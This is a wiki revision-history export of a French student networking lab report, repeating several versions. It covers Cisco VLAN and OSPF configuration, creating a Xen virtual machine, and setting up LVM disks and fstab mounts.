| Clement || 110 || 10.10.0.0/16 || 2001:7A8:116E:60BA::0/64 || 10.10.0.250 || 10.10.0.251 || 10.10.0.252 || 10.10.0.253 || Coquelicot || Corona<br />
|-<br />
| INTERCO || 531 || 192.168.222.72/29 || || || 192.168.222.73 || 192.168.222.74 || 192.168.222.75 || || &nbsp;<br />
|-<br />
| XEN || 42 || 193.48.57.160/28 || 2001:7A8:116E:60BF::0/64 || 193.48.57.190/28 2001:7A8:116E:60B0::F3/64 || 193.48.57.187/28 2001:7A8:116E:60B0::F0/64|| 193.48.57.188/28 2001:7A8:116E:60B0::F1/64 || 192.48.57.189/28 2001:7A8:116E:60B0::F2/64|| || &nbsp;<br />
|-<br />
|}<br />
<br />
Table du VLAN 42<br />
{| class="wikitable"<br />
! Groupe !! @IPv4 MV !! @IPv6 MV (auto) <br />
|- <br />
| Andrei / Julien || 193.48.57.176/28 || &nbsp;<br />
|-<br />
| Robin / Aviran || 193.48.57.177/28 || &nbsp;<br />
|-<br />
| Axel / Guillaume || 193.48.57.178/28 || &nbsp;<br />
|-<br />
| Selim / Raphael || 193.48.57.179/28 || &nbsp;<br />
|-<br />
| Helene / Camille || 193.48.57.180/28 || &nbsp;<br />
|-<br />
| Boris / Louis || 193.48.57.181/28 || &nbsp;<br />
|-<br />
| Johnny / Arthur || 193.48.57.182/28 || &nbsp;<br />
|-<br />
| Mel / Theo || 193.48.57.183/28 || &nbsp;<br />
|-<br />
| Khalil / Alvare || 193.48.57.184/28 || &nbsp;<br />
|-<br />
| Souleyman / Enoch || 193.48.57.185/28 || &nbsp;<br />
|-<br />
| Clement || 193.48.57.186/28 || &nbsp;<br />
|-<br />
|}<br />
<br />
<!--<br />
Note : <br />
<br />
'''à compléter '''<br />
{| class="wikitable"<br />
! Entité !! Élève !! Domaine !! 193.48.57.176/28 !! 10.60.0.0/16 !! 2001:660:4401:60B0::/60 !! 2001:7A8:116E:60B0::/60 !! VLAN !! VLAN WIFI !! N° VRRP !! SSID n°1 !! SSID n°2<br />
|-<br />
| ROUTEUR E304<br />
| <br />
| 193.48.57.187<br />
| <br />
| :: :F0<br />
| :: :F0<br />
| 10.NN.00.250<br />
| <br />
| <br />
| <br />
|- <br />
| ROUTEUR E306<br />
| <br />
| 193.48.57.188<br />
| <br />
| :: :F1<br />
| :: :F1<br />
| 10.NN.00.251<br />
| <br />
| <br />
| <br />
|- <br />
| ROUTEUR SR52<br />
| <br />
| 193.48.57.189<br />
| <br />
| :: :F2<br />
| :: :F2<br />
| 10.NN.00.252<br />
| <br />
| <br />
| <br />
|- <br />
| ROUTEUR FLOTTANTE<br />
| <br />
| 193.48.57.190<br />
| <br />
| :: :F3<br />
| :: :F3<br />
| 10.NN.00.253<br />
| <br />
| <br />
| <br />
|- <br />
| Vlan INTERCO 531 INTERCO-SA<br />
| <br />
| 192.168.222.40/29<br />
| <br />
| fe80::/10 ::1<br />
| fe80::/10 ::1<br />
| 10.NN.00.253<br />
| <br />
| <br />
| <br />
|- <br />
| Vlan INTERCO E304<br />
| <br />
| 192.168.222.41/29<br />
| <br />
| fe80::/10 ::1<br />
| fe80::/10 ::1<br />
| <br />
| <br />
| <br />
| <br />
|- <br />
| Vlan INTERCO E306<br />
| <br />
| 192.168.222.42/29<br />
| <br />
| fe80::/10 ::2<br />
| fe80::/10 ::2<br />
| <br />
| <br />
| <br />
| <br />
|- <br />
| Vlan INTERCO SR53<br />
| <br />
| 192.168.222.43/29<br />
| <br />
| fe80::/10 ::3<br />
| fe80::/10 ::3<br />
| <br />
| <br />
| <br />
| <br />
|}<br />
!--><br />
<br />
<br />
* Plan d'adressage IPv4 :<br />
{| class="plan_addr"<br />
! VLAN !! Nom !! Réseau IPv4 !! Cisco 6509-E !! Cisco 9200 !! Cisco ISR 4331 !! Routeur plateforme maths/info !! PA Wifi n°1 !! PA Wifi n°2<br />
|-<br />
|<br />
|}<br />
<br />
* Plan d'adressage IPv6 :<br />
{| class="plan_addr"<br />
! VLAN !! Nom !! Réseau IPv6 !! Cisco 6509-E !! Cisco 9200 !! Cisco ISR 4331 !! Routeur plateforme maths/info !! PA Wifi n°1 !! PA Wifi n°2<br />
|-<br />
<br />
|}<br />
<br />
=Architecture réseau=</div>Avercaemhttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&diff=56590TP sysres IMA5 2021/2022 G72021-11-29T15:07:06Z<p>Avercaem : /* OPSF */</p>
<hr />
<div><br />
= PRA 2021-2022 Arthur Vercaemst - Johnny Gouvaert =<br />
<br />
==Répartition travail==<br />
<br />
== Réseau ==<br />
<br />
=== Configuration IPV4 ===<br />
<br />
==== Paramétrage des VLANs ====<br />
<br />
'''9200'''<br />
Nous avons pris la tache de configurer le routeur cisco 9200 de la salle E-306<br />
<br />
Dans un premier temps, nous avons créé le VLAN 42. Ce VLAN permet l'accès au routeur 9200 depuis les VMs<br />
Il est donc connecté au port TenGigabitethernet1/1/2 (10G) sur lequel est branchée un fibre venant du serveur capbreton.<br />
<br />
enable<br />
conf t<br />
vlan 42<br />
exit<br />
int vlan 42<br />
no shut<br />
ip address 193.48.57.188 255.255.255.192<br />
ipv6 enable<br />
ipv6 address 2001:7A8:116E:60B0::F1/64 eui-64<br />
exit<br />
int TenGigabitethernet1/1/2<br />
no shut<br />
switchport mode access<br />
switchport access vlan 42<br />
exit<br />
exit<br />
write<br />
<br />
Ensuite, nous avons créé et configuré le VLAN 531. Ce vlan est relié par fibre au routeur de l'ecole pour l'accès internet<br />
<br />
enable<br />
conf t<br />
vlan 531<br />
exit<br />
int vlan 531<br />
no shut<br />
ip address 192.168.222.42 255.255.255.248<br />
exit<br />
int TenGigabitethernet1/1/1<br />
no shut<br />
switchport mode access<br />
switchport access vlan 531<br />
exit<br />
exit<br />
write<br />
<br />
==== OPSF ====<br />
OSPF (Open Shortest Path First) à chaque routeur de partager sa connaissance de la topologie du réseau, de cette manière on rends possible un routage plus dynamique sur notre infrastructure.<br />
<br />
router ospf 1 <br />
router-id 10.00.0.1 <br />
log-adjacency-changes <br />
summary-address 193.48.57.176 255.255.255.240 <br />
summary-address 100.64.0.0 255.240.0.0 not-advertise <br />
summary-address 10.0.0.0 255.0.0.0 not-advertise <br />
redistribute connected subnets <br />
redistribute static subnets <br />
network 192.168.222.8 0.0.0.7 area 2<br />
<br />
==Création de notre VM==<br />
<br />
Après problème dû au l'utilisation de la commande su au lieux de su - nous avons créé notre image de notre VM<br />
<br />
xen-create-image --hostname=Anosteke --ip=193.48.57.182 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=pasglop --dist=bullseye<br />
<br />
Nous créons ensuite les 2 disques virtuels <br />
<br />
lvcreate -L10G -n Anosteke1 storage<br />
lvcreate -L10G -n Anosteke2 storage<br />
<br />
Puis nous les formatons<br />
<br />
mkfs.ext4 /dev/storage/Anosteke1<br />
mkfs.ext4 /dev/storage/Anosteke2<br />
<br />
Nous ajoutons les 2 disques au fichier de configuration de notre VM <br />
<br />
nano /etc/xen/Anosteke.cfg<br />
disk = [<br />
'file:/usr/local/xen/domains/Bellerose/disk.img,xvda2,w',<br />
'file:/usr/local/xen/domains/Bellerose/swap.img,xvda1,w',<br />
'phy:/dev/storage/Anosteke1,xvda3,w',<br />
'phy:/dev/storage/Anosteke2,xvda4,w'<br />
]<br />
vif = [ 'ip=193.48.57.182 ,mac=00:16:3E:AA:F5:2B ,bridge=IMA5sc' ]<br />
<br />
On peut ensuite démarrer notre VM<br />
<br />
xl create -c /etc/xen/AnosTeke.cfg<br />
<br />
Pour enfin configurer nos espaces disque, en commençant par créer et monter nos espaces<br />
<br />
mkdir /mnt/xvda3<br />
mkdir /mnt/xvda4<br />
mount /dev/xvda3 /mnt/xvda3<br />
mount /dev/xvda4 /mnt/xvda4<br />
mv /var/* /mnt/xvda4<br />
<br />
Pour finaliser le montage des espaces, on modifie le fichier /etc/fstab pour y ajouter nos emplacements<br />
<br />
/dev/xvda3 /home ext4 defaults 0 2<br />
/dev/xvda4 /var ext4 defaults 0 2<br />
<br />
On les configure DUMP disabled et Fsck 2.<br />
On peut finalement lancer le MOUNT<br />
<br />
mount -a<br />
<br />
et vérifier la bonne execution<br />
lsblk<br />
<br />
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT<br />
xvda1 202:1 0 512M 0 disk [SWAP]<br />
xvda2 202:2 0 4G 0 disk /<br />
xvda3 202:3 0 10G 0 disk /home<br />
xvda4 202:4 0 10G 0 disk /var</div>Avercaemhttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&diff=56589TP sysres IMA5 2021/2022 G72021-11-29T15:06:51Z<p>Avercaem : /* OPSF */</p>
<hr />
<div><br />
= PRA 2021-2022 Arthur Vercaemst - Johnny Gouvaert =<br />
<br />
==Répartition travail==<br />
<br />
== Réseau ==<br />
<br />
=== Configuration IPV4 ===<br />
<br />
==== Paramétrage des VLANs ====<br />
<br />
'''9200'''<br />
Nous avons pris la tache de configurer le routeur cisco 9200 de la salle E-306<br />
<br />
Dans un premier temps, nous avons créé le VLAN 42. Ce VLAN permet l'accès au routeur 9200 depuis les VMs<br />
Il est donc connecté au port TenGigabitethernet1/1/2 (10G) sur lequel est branchée un fibre venant du serveur capbreton.<br />
<br />
enable<br />
conf t<br />
vlan 42<br />
exit<br />
int vlan 42<br />
no shut<br />
ip address 193.48.57.188 255.255.255.192<br />
ipv6 enable<br />
ipv6 address 2001:7A8:116E:60B0::F1/64 eui-64<br />
exit<br />
int TenGigabitethernet1/1/2<br />
no shut<br />
switchport mode access<br />
switchport access vlan 42<br />
exit<br />
exit<br />
write<br />
<br />
Ensuite, nous avons créé et configuré le VLAN 531. Ce vlan est relié par fibre au routeur de l'ecole pour l'accès internet<br />
<br />
enable<br />
conf t<br />
vlan 531<br />
exit<br />
int vlan 531<br />
no shut<br />
ip address 192.168.222.42 255.255.255.248<br />
exit<br />
int TenGigabitethernet1/1/1<br />
no shut<br />
switchport mode access<br />
switchport access vlan 531<br />
exit<br />
exit<br />
write<br />
<br />
==== OPSF ====<br />
OSPF (Open Shortest Path First) à chaque routeur de partager sa connaissance de la topologie du réseau, de cette manière on rends possible un routage plus dynamique sur notre infrastructure.<br />
<br />
router ospf 1 <br />
router-id 10.00.0.1 <br />
log-adjacency-changes <br />
summary-address 193.48.57.176 255.255.255.240 <br />
summary-address 100.64.0.0 255.240.0.0 not-advertise <br />
summary-address 10.0.0.0 255.0.0.0 not-advertise <br />
redistribute connected subnets <br />
redistribute static subnets <br />
network 192.168.222.8 0.0.0.7 area 2<br />
<br />
==Création de notre VM==<br />
<br />
Après problème dû au l'utilisation de la commande su au lieux de su - nous avons créé notre image de notre VM<br />
<br />
xen-create-image --hostname=Anosteke --ip=193.48.57.182 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=pasglop --dist=bullseye<br />
<br />
Nous créons ensuite les 2 disques virtuels <br />
<br />
lvcreate -L10G -n Anosteke1 storage<br />
lvcreate -L10G -n Anosteke2 storage<br />
<br />
Puis nous les formatons<br />
<br />
mkfs.ext4 /dev/storage/Anosteke1<br />
mkfs.ext4 /dev/storage/Anosteke2<br />
<br />
Nous ajoutons les 2 disques au fichier de configuration de notre VM <br />
<br />
nano /etc/xen/Anosteke.cfg<br />
disk = [<br />
'file:/usr/local/xen/domains/Bellerose/disk.img,xvda2,w',<br />
'file:/usr/local/xen/domains/Bellerose/swap.img,xvda1,w',<br />
'phy:/dev/storage/Anosteke1,xvda3,w',<br />
'phy:/dev/storage/Anosteke2,xvda4,w'<br />
]<br />
vif = [ 'ip=193.48.57.182 ,mac=00:16:3E:AA:F5:2B ,bridge=IMA5sc' ]<br />
<br />
On peut ensuite démarrer notre VM<br />
<br />
xl create -c /etc/xen/AnosTeke.cfg<br />
<br />
Pour enfin configurer nos espaces disque, en commençant par créer et monter nos espaces<br />
<br />
mkdir /mnt/xvda3<br />
mkdir /mnt/xvda4<br />
mount /dev/xvda3 /mnt/xvda3<br />
mount /dev/xvda4 /mnt/xvda4<br />
mv /var/* /mnt/xvda4<br />
<br />
Pour finaliser le montage des espaces, on modifie le fichier /etc/fstab pour y ajouter nos emplacements<br />
<br />
/dev/xvda3 /home ext4 defaults 0 2<br />
/dev/xvda4 /var ext4 defaults 0 2<br />
<br />
On les configure DUMP disabled et Fsck 2.<br />
On peut finalement lancer le MOUNT<br />
<br />
mount -a<br />
<br />
et vérifier la bonne execution<br />
lsblk<br />
<br />
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT<br />
xvda1 202:1 0 512M 0 disk [SWAP]<br />
xvda2 202:2 0 4G 0 disk /<br />
xvda3 202:3 0 10G 0 disk /home<br />
xvda4 202:4 0 10G 0 disk /var</div>Avercaemhttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&diff=56278TP sysres IMA5 2021/2022 G72021-10-25T15:54:48Z<p>Avercaem : /* Création de notre VM */</p>
<hr />
<div><br />
= PRA 2021-2022 Arthur Vercaemst - Johnny Gouvaert =<br />
<br />
==Répartition travail==<br />
<br />
==Configuration IPV4==<br />
<br />
=== Paramétrage des VLANs ===<br />
<br />
'''9200'''<br />
Nous avons pris la tache de configurer le routeur cisco 9200 de la salle E-306<br />
<br />
Dans un premier temps, nous avons créé le VLAN 42. Ce VLAN permet l'accès au routeur 9200 depuis les VMs<br />
Il est donc connecté au port TenGigabitethernet1/1/2 (10G) sur lequel est branchée un fibre venant du serveur capbreton.<br />
<br />
enable<br />
conf t<br />
vlan 42<br />
exit<br />
int vlan 42<br />
no shut<br />
ip address 193.48.57.188 255.255.255.192<br />
ipv6 enable<br />
ipv6 address 2001:7A8:116E:60B0::F1/64 eui-64<br />
exit<br />
int TenGigabitethernet1/1/2<br />
no shut<br />
switchport mode access<br />
switchport access vlan 42<br />
exit<br />
exit<br />
write<br />
<br />
Ensuite, nous avons créé et configuré le VLAN 531. Ce vlan est relié par fibre au routeur de l'ecole pour l'accès internet<br />
<br />
enable<br />
conf t<br />
vlan 531<br />
exit<br />
int vlan 531<br />
no shut<br />
ip address 192.168.222.42 255.255.255.248<br />
exit<br />
int TenGigabitethernet1/1/1<br />
no shut<br />
switchport mode access<br />
switchport access vlan 531<br />
exit<br />
exit<br />
write<br />
<br />
==Création de notre VM==<br />
<br />
Après problème dû au l'utilisation de la commande su au lieux de su - nous avons créé notre image de notre VM<br />
<br />
xen-create-image --hostname=Anosteke --ip=193.48.57.182 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=pasglop --dist=bullseye<br />
<br />
Nous créons ensuite les 2 disques virtuels <br />
<br />
lvcreate -L10G -n Anosteke1 storage<br />
lvcreate -L10G -n Anosteke2 storage<br />
<br />
Puis nous les formatons<br />
<br />
mkfs.ext4 /dev/storage/Anosteke1<br />
mkfs.ext4 /dev/storage/Anosteke2<br />
<br />
Nous ajoutons les 2 disques au fichier de configuration de notre VM <br />
<br />
nano /etc/xen/Anosteke.cfg<br />
disk = [<br />
'file:/usr/local/xen/domains/Bellerose/disk.img,xvda2,w',<br />
'file:/usr/local/xen/domains/Bellerose/swap.img,xvda1,w',<br />
'phy:/dev/storage/Anosteke1,xvda3,w',<br />
'phy:/dev/storage/Anosteke2,xvda4,w'<br />
]<br />
vif = [ 'ip=193.48.57.182 ,mac=00:16:3E:AA:F5:2B ,bridge=IMA5sc' ]<br />
<br />
On peut ensuite démarrer notre VM<br />
<br />
xl create -c /etc/xen/AnosTeke.cfg<br />
<br />
Pour enfin configurer nos espaces disque, en commençant par créer et monter nos espaces<br />
<br />
mkdir /mnt/xvda3<br />
mkdir /mnt/xvda4<br />
mount /dev/xvda3 /mnt/xvda3<br />
mount /dev/xvda4 /mnt/xvda4<br />
mv /var/* /mnt/xvda4<br />
<br />
Pour finaliser le montage des espaces, on modifie le fichier /etc/fstab pour y ajouter nos emplacements<br />
<br />
/dev/xvda3 /home ext4 defaults 0 2<br />
/dev/xvda4 /var ext4 defaults 0 2<br />
<br />
On les configure DUMP disabled et Fsck 2.<br />
On peut finalement lancer le MOUNT<br />
<br />
mount -a<br />
<br />
et vérifier la bonne execution<br />
lsblk<br />
<br />
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT<br />
xvda1 202:1 0 512M 0 disk [SWAP]<br />
xvda2 202:2 0 4G 0 disk /<br />
xvda3 202:3 0 10G 0 disk /home<br />
xvda4 202:4 0 10G 0 disk /var</div>Avercaemhttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&diff=56277TP sysres IMA5 2021/2022 G72021-10-25T15:53:52Z<p>Avercaem : /* Création de notre VM */</p>
<hr />
<div><br />
= PRA 2021-2022 Arthur Vercaemst - Johnny Gouvaert =<br />
<br />
==Répartition travail==<br />
<br />
==Configuration IPV4==<br />
<br />
=== Paramétrage des VLANs ===<br />
<br />
'''9200'''<br />
Nous avons pris la tache de configurer le routeur cisco 9200 de la salle E-306<br />
<br />
Dans un premier temps, nous avons créé le VLAN 42. Ce VLAN permet l'accès au routeur 9200 depuis les VMs<br />
Il est donc connecté au port TenGigabitethernet1/1/2 (10G) sur lequel est branchée un fibre venant du serveur capbreton.<br />
<br />
enable<br />
conf t<br />
vlan 42<br />
exit<br />
int vlan 42<br />
no shut<br />
ip address 193.48.57.188 255.255.255.192<br />
ipv6 enable<br />
ipv6 address 2001:7A8:116E:60B0::F1/64 eui-64<br />
exit<br />
int TenGigabitethernet1/1/2<br />
no shut<br />
switchport mode access<br />
switchport access vlan 42<br />
exit<br />
exit<br />
write<br />
<br />
Ensuite, nous avons créé et configuré le VLAN 531. Ce vlan est relié par fibre au routeur de l'ecole pour l'accès internet<br />
<br />
enable<br />
conf t<br />
vlan 531<br />
exit<br />
int vlan 531<br />
no shut<br />
ip address 192.168.222.42 255.255.255.248<br />
exit<br />
int TenGigabitethernet1/1/1<br />
no shut<br />
switchport mode access<br />
switchport access vlan 531<br />
exit<br />
exit<br />
write<br />
<br />
==Création de notre VM==<br />
<br />
Après problème dû au l'utilisation de la commande su au lieux de su - nous avons créé notre image de notre VM<br />
<br />
xen-create-image --hostname=Anosteke --ip=193.48.57.182 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=pasglop --dist=bullseye<br />
<br />
Nous créons ensuite les 2 disques virtuels <br />
<br />
lvcreate -L10G -n Anosteke1 storage<br />
lvcreate -L10G -n Anosteke2 storage<br />
<br />
Puis nous les formatons<br />
<br />
mkfs.ext4 /dev/storage/Anosteke1<br />
mkfs.ext4 /dev/storage/Anosteke2<br />
<br />
Nous ajoutons les 2 disques au fichier de configuration de notre VM <br />
<br />
nano /etc/xen/Anosteke.cfg<br />
disk = [<br />
'file:/usr/local/xen/domains/Bellerose/disk.img,xvda2,w',<br />
'file:/usr/local/xen/domains/Bellerose/swap.img,xvda1,w',<br />
'phy:/dev/storage/Anosteke1,xvda3,w',<br />
'phy:/dev/storage/Anosteke2,xvda4,w'<br />
]<br />
vif = [ 'ip=193.48.57.182 ,mac=00:16:3E:AA:F5:2B ,bridge=IMA5sc' ]<br />
<br />
On peut ensuite démarrer notre VM<br />
<br />
xl create -c /etc/xen/AnosTeke.cfg<br />
<br />
Pour enfin configurer nos espaces disque, en commençant par créer et monter nos espaces<br />
<br />
mkdir /mnt/xvda3<br />
mkdir /mnt/xvda4<br />
mount /dev/xvda3 /mnt/xvda3<br />
mount /dev/xvda4 /mnt/xvda4<br />
mv /var/* /mnt/xvda4<br />
<br />
Pour finaliser le montage des espaces, on modifie le fichier /etc/fstab pour y ajouter nos emplacements<br />
<br />
/dev/xvda3 /home ext4 defaults 0 2<br />
/dev/xvda4 /var ext4 defaults 0 2<br />
<br />
On les configure DUMP disabled et Fsck 2.<br />
On peut finalement lancer le MOUNT<br />
<br />
mount -a<br />
<br />
et vérifier la bonne execution<br />
lsblk</div>Avercaemhttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&diff=56230TP sysres IMA5 2021/2022 G72021-10-25T14:58:35Z<p>Avercaem : </p>
<hr />
<div><br />
= PRA 2021-2022 Arthur Vercaemst - Johnny Gouvaert =<br />
<br />
==Répartition travail==<br />
<br />
==Configuration IPV4==<br />
<br />
=== Paramétrage des VLANs ===<br />
<br />
'''9200'''<br />
Nous avons pris la tache de configurer le routeur cisco 9200 de la salle E-306<br />
<br />
Dans un premier temps, nous avons créé le VLAN 42. Ce VLAN permet l'accès au routeur 9200 depuis les VMs<br />
Il est donc connecté au port TenGigabitethernet1/1/2 (10G) sur lequel est branchée un fibre venant du serveur capbreton.<br />
<br />
enable<br />
conf t<br />
vlan 42<br />
exit<br />
int vlan 42<br />
no shut<br />
ip address 193.48.57.188 255.255.255.192<br />
ipv6 enable<br />
ipv6 address 2001:7A8:116E:60B0::F1/64 eui-64<br />
exit<br />
int TenGigabitethernet1/1/2<br />
no shut<br />
switchport mode access<br />
switchport access vlan 42<br />
exit<br />
exit<br />
write<br />
<br />
Ensuite, nous avons créé et configuré le VLAN 531. Ce vlan est relié par fibre au routeur de l'ecole pour l'accès internet<br />
<br />
enable<br />
conf t<br />
vlan 531<br />
exit<br />
int vlan 531<br />
no shut<br />
ip address 192.168.222.42 255.255.255.248<br />
exit<br />
int TenGigabitethernet1/1/1<br />
no shut<br />
switchport mode access<br />
switchport access vlan 531<br />
exit<br />
exit<br />
write<br />
<br />
==Création de notre VM==<br />
<br />
Après problème dû au l'utilisation de la commande su au lieux de su - nous avons créé notre image de notre VM<br />
<br />
xen-create-image --hostname=Anosteke --ip=193.48.57.182 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=pasglop --dist=bullseye<br />
<br />
Nous créons ensuite les 2 disques virtuels <br />
<br />
lvcreate -L10G -n Anosteke1 storage<br />
lvcreate -L10G -n Anosteke2 storage<br />
<br />
Puis nous les formatons<br />
<br />
mkfs.ext4 /dev/storage/Anosteke1<br />
mkfs.ext4 /dev/storage/Anosteke2<br />
<br />
Nous ajoutons les 2 disques au fichier de configuration de notre VM <br />
<br />
nano /etc/xen/Anosteke.cfg<br />
disk = [<br />
'file:/usr/local/xen/domains/Bellerose/disk.img,xvda2,w',<br />
'file:/usr/local/xen/domains/Bellerose/swap.img,xvda1,w',<br />
'phy:/dev/storage/Anosteke1,xvda3,w',<br />
'phy:/dev/storage/Anosteke2,xvda4,w'<br />
]<br />
vif = [ 'ip=193.48.57.182 ,mac=00:16:3E:AA:F5:2B ,bridge=IMA5sc' ]</div>Avercaemhttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&diff=56228TP sysres IMA5 2021/2022 G72021-10-25T14:58:15Z<p>Avercaem : </p>
<hr />
<div><br />
= PRA 2021-2022 Arthur Vercaemst - Johnny Gouvaert =<br />
<br />
==Répartition travail==<br />
<br />
==Configuration IPV4==<br />
<br />
=== Paramétrage des VLANs ===<br />
<br />
'''9200'''<br />
Nous avons pris la tache de configurer le routeur cisco 9200 de la salle E-306<br />
<br />
Dans un premier temps, nous avons créé le VLAN 42. Ce VLAN permet l'accès au routeur 9200 depuis les VMs<br />
Il est donc connecté au port TenGigabitethernet1/1/2 (10G) sur lequel est branchée un fibre venant du serveur capbreton.<br />
<br />
enable<br />
conf t<br />
vlan 42<br />
exit<br />
int vlan 42<br />
no shut<br />
ip address 193.48.57.188 255.255.255.192<br />
ipv6 enable<br />
ipv6 address 2001:7A8:116E:60B0::F1/64 eui-64<br />
exit<br />
int TenGigabitethernet1/1/2<br />
no shut<br />
switchport mode access<br />
switchport access vlan 42<br />
exit<br />
exit<br />
write<br />
<br />
Ensuite, nous avons créé et configuré le VLAN 531. Ce vlan est relié par fibre au routeur de l'ecole pour l'accès internet<br />
<br />
enable<br />
conf t<br />
vlan 531<br />
exit<br />
int vlan 531<br />
no shut<br />
ip address 192.168.222.42 255.255.255.248<br />
exit<br />
int TenGigabitethernet1/1/1<br />
no shut<br />
switchport mode access<br />
switchport access vlan 531<br />
exit<br />
exit<br />
write<br />
<br />
==Création de notre VM==<br />
<br />
Après problème dû au l'utilisation de la commande su au lieux de su - nous avons créé notre image de notre VM<br />
<br />
xen-create-image --hostname=Anosteke --ip=193.48.57.182 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=pasglop --dist=bullseye<br />
<br />
Nous créons ensuite les 2 disques virtuels <br />
<br />
lvcreate -L10G -n Anosteke1 storage<br />
lvcreate -L10G -n Anosteke2 storage<br />
<br />
Puis nous les formatons<br />
<br />
mkfs.ext4 /dev/storage/Anosteke1<br />
mkfs.ext4 /dev/storage/Anosteke2<br />
<br />
Nous ajoutons les 2 disques au fichier de configuration de notre VM <br />
<br />
nano /etc/xen/Anosteke.cfg<br />
disk = [<br />
'file:/usr/local/xen/domains/Bellerose/disk.img,xvda2,w',<br />
'file:/usr/local/xen/domains/Bellerose/swap.img,xvda1,w',<br />
'phy:/dev/storage/Anosteke1,xvda3,w',<br />
'phy:/dev/storage/Anosteke2,xvda4,w'<br />
]<br />
vif = [ 'ip=193.48.57.182 ,mac=00:16:3E:AA:F5:2B ,bridge=IMA5sc' ]</div>Avercaemhttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&diff=56215TP sysres IMA5 2021/2022 G72021-10-25T14:50:59Z<p>Avercaem : </p>
<hr />
<div><br />
= PRA 2021-2022 Arthur Vercaemst - Johnny Gouvaert =<br />
<br />
==Répartition travail==<br />
<br />
==Configuration IPV4==<br />
<br />
=== Paramétrage des VLANs ===<br />
<br />
'''9200'''<br />
Nous avons pris la tache de configurer le routeur cisco 9200 de la salle E-306<br />
<br />
Dans un premier temps, nous avons créé le VLAN 42. Ce VLAN permet l'accès au routeur 9200 depuis les VMs<br />
Il est donc connecté au port TenGigabitethernet1/1/2 (10G) sur lequel est branchée un fibre venant du serveur capbreton.<br />
<br />
enable<br />
conf t<br />
vlan 42<br />
exit<br />
int vlan 42<br />
no shut<br />
ip address 193.48.57.188 255.255.255.192<br />
ipv6 enable<br />
ipv6 address 2001:7A8:116E:60B0::F1/64 eui-64<br />
exit<br />
int TenGigabitethernet1/1/2<br />
no shut<br />
switchport mode access<br />
switchport access vlan 42<br />
exit<br />
exit<br />
write<br />
<br />
Ensuite, nous avons créé et configuré le VLAN 531. Ce vlan est relié par fibre au routeur de l'ecole pour l'accès internet<br />
<br />
enable<br />
conf t<br />
vlan 531<br />
exit<br />
int vlan 531<br />
no shut<br />
ip address 192.168.222.42 255.255.255.248<br />
exit<br />
int TenGigabitethernet1/1/1<br />
no shut<br />
switchport mode access<br />
switchport access vlan 531<br />
exit<br />
exit<br />
write<br />
<br />
==Création de notre VM==<br />
<br />
Après problème dû au l'utilisation de la commande su au lieux de su - nous avons créé notre image de notre VM<br />
<br />
xen-create-image --hostname=Anosteke --ip=193.48.57.182 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=pasglop --dist=bullseye<br />
<br />
Nous créons ensuite les 2 disques virtuels <br />
<br />
lvcreate -L10G -n Anosteke1 storage<br />
lvcreate -L10G -n Anosteke2 storage<br />
<br />
Puis nous les formatons<br />
<br />
mkfs.ext4 /dev/storage/Anosteke1<br />
mkfs.ext4 /dev/storage/Anosteke2</div>Avercaemhttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&diff=56211TP sysres IMA5 2021/2022 G72021-10-25T14:49:05Z<p>Avercaem : </p>
<hr />
<div><br />
= PRA 2021-2022 Arthur Vercaemst - Johnny Gouvaert =<br />
<br />
==Répartition travail==<br />
<br />
==Configuration IPV4==<br />
<br />
=== Paramétrage des VLANs ===<br />
<br />
'''9200'''<br />
Nous avons pris la tache de configurer le routeur cisco 9200 de la salle E-306<br />
<br />
Dans un premier temps, nous avons créé le VLAN 42. Ce VLAN permet l'accès au routeur 9200 depuis les VMs<br />
Il est donc connecté au port TenGigabitethernet1/1/2 (10G) sur lequel est branchée un fibre venant du serveur capbreton.<br />
<br />
enable<br />
conf t<br />
vlan 42<br />
exit<br />
int vlan 42<br />
no shut<br />
ip address 193.48.57.188 255.255.255.192<br />
ipv6 enable<br />
ipv6 address 2001:7A8:116E:60B0::F1/64 eui-64<br />
exit<br />
int TenGigabitethernet1/1/2<br />
no shut<br />
switchport mode access<br />
switchport access vlan 42<br />
exit<br />
exit<br />
write<br />
<br />
Ensuite, nous avons créé et configuré le VLAN 531. Ce vlan est relié par fibre au routeur de l'ecole pour l'accès internet<br />
<br />
enable<br />
conf t<br />
vlan 531<br />
exit<br />
int vlan 531<br />
no shut<br />
ip address 192.168.222.42 255.255.255.248<br />
exit<br />
int TenGigabitethernet1/1/1<br />
no shut<br />
switchport mode access<br />
switchport access vlan 531<br />
exit<br />
exit<br />
write<br />
<br />
==Création de notre VM==<br />
<br />
Après problème dû au l'utilisation de la commande su au lieux de su -<br />
<br />
xen-create-image --hostname=Anosteke --ip=193.48.57.182 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=pasglop --dist=bullseye<br />
<br />
lvcreate -L10G -n Anosteke1 storage<br />
lvcreate -L10G -n Anosteke2 storage</div>Avercaemhttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&diff=56209TP sysres IMA5 2021/2022 G72021-10-25T14:47:36Z<p>Avercaem : </p>
<hr />
<div><br />
= PRA 2021-2022 Arthur Vercaemst - Johnny Gouvaert =<br />
<br />
==Répartition travail==<br />
<br />
==Configuration IPV4==<br />
<br />
=== Paramétrage des VLANs ===<br />
<br />
